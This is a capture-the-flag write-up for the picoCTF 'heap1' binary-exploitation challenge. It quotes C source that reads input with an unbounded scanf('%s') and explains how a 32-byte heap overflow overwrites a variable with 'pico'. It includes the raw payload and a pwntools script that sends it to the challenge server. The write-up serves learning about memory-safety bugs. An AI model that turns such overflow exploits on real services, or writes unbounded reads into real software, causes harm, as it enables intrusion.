heap1
⚒️ Heap 1
| Category | Author |
|---|---|
| ⚒️ Binary Exploitation | Abrxs, pr1or1tyQ |
Challenge Prompt
Can you control your overflow?
Download the binary here.
Download the source here.
Problem Type
- Buffer Overflow
Solve
We are given the program source code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define FLAGSIZE_MAX 64
// amount of memory allocated for input_data
#define INPUT_DATA_SIZE 5
// amount of memory allocated for safe_var
#define SAFE_VAR_SIZE 5
int num_allocs;
char *safe_var;
char *input_data;
void check_win() {
if (!strcmp(safe_var, "pico")) {
printf("\nYOU WIN\n");
// code removed for brevity
void write_buffer() {
printf("Data for buffer: ");
fflush(stdout);
scanf("%s", input_data);
}
// code removed for brevity
In this program we are given the code wrote in C. The scanf function with the %s format specifier in the write_buffer function is inherently dangerous because it performs no bounds checking.
It will keep writing characters into input_data until it hits a space or a newline, completely ignoring the fact that input_data was only allocated 5 bytes (INPUT_DATA_SIZE at the begining of the code).
When we run the program we see 2 addresses and thier data. If we can overwrite bico with pico we can get the program to print the flag.
We can take our 2 values and put them into a hex calculator like RapidTables and figure out how far apart the locations are:
In this case they are 32 bytes apart. So we need to send 32 A characters to make up the difference plus the characters we want to write over the bico.
You can simply send 32 A characters and then pico (AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAApico) to the program after picking option 2 and then pick option 4 to print the flag, which is what I did at first.
But I wanted to get some more practice with pwntools so I decided to try that too:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
from pwn import *
HOST = 'tethys.picoctf.net'
PORT = 64172
p = remote(HOST, PORT)
p.recvuntil(b'Enter your choice: ')
p.sendline(b"2")
p.recvuntil(b'Data for buffer: ')
p.sendline(b"A" * 32 + b"pico")
p.recvuntil(b'Enter your choice: ')
p.sendline(b"4")
print(p.recvall().decode())
